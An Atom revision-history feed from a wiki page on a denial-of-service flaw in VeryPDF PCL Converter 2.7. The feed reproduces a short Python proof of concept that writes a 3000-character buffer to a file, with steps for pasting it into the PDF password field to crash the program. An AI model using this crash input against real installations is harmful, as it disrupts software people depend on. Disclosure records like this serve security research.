<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PCL_Converter_2.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>PCL Converter 2.7 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PCL_Converter_2.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PCL_Converter_2.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T08:55:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=PCL_Converter_2.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2016&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # -*- coding: utf-8 -*- # Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendor Homepage:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PCL_Converter_2.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2016&amp;oldid=prev"/>
		<updated>2021-05-02T04:36:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # -*- coding: utf-8 -*- # Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendor Homepage:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# -*- coding: utf-8 -*-&lt;br /&gt;
# Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC)&lt;br /&gt;
# Date: 19/05/2019&lt;br /&gt;
# Author: Alejandra Sánchez&lt;br /&gt;
# Vendor Homepage: http://www.verypdf.com&lt;br /&gt;
# Software: http://www.verypdf.com/pcltools/pcl-converter.exe&lt;br /&gt;
# Version: 2.7&lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
&lt;br /&gt;
# Proof of Concept:&lt;br /&gt;
# 1.- Run the python script &amp;quot;PCLConverter.py&amp;quot;, it will create a new file &amp;quot;PCLConverter.txt&amp;quot;&lt;br /&gt;
# 2.- Copy the text from the generated PCLConverter.txt file to clipboard&lt;br /&gt;
# 3.- Open VeryPDF PCL Converter v2.7 &lt;br /&gt;
# 4.- Go to 'Setting' &amp;gt; 'PDF Security'&lt;br /&gt;
# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'&lt;br /&gt;
# 6.- Click on 'Add File(s)', and select a pcl file, e.g. 'sample.pcl'&lt;br /&gt;
# 7.- Click on 'Start', you will see a crash&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 3000&lt;br /&gt;
f = open (&amp;quot;PCLConverter.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(buffer)&lt;br /&gt;
f.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>